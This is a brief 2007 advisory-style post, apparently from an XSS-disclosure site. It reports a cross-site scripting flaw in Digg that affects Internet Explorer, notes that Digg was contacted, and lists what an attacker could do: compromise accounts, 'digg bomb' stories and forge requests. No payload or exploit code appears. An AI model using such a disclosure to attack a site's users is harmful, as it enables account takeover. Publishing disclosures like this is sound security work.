Just another summer XSS in

Written by DP

Wednesday, 4 July 2007

Just another XSS vuln affecting Digg. Zuppergazi - a very active author - discovered it and notified us. Although we could not reproduce the last XSS in Digg (the reason being that it was promptly fixed), this time we were able to mirror it, and want to believe that the author has already contacted their staff in order to let them know about the issue. We also contacted Digg - just to make sure that the associated possible risks are kept to the minimum severity.

Currently, this XSS works with the latest version of Internet Explorer. Most probably it does not work with Firefox.

Input from is not properly validated.

It can be exploited by malicious users to compromise user accounts, "digg bomb" stories and perform cross-site request forgeries (CSRF) - as with most XSS.

It is almost a certainty that this XSS is not the last one. Digg has suffered in the past from XSS vulnerabilities, but fixed them all pretty quick: - March 2007

Home | News | Articles | Advisories | Submit | Alerts | Links | What is XSS | About | Contact | Some Rights Reserved.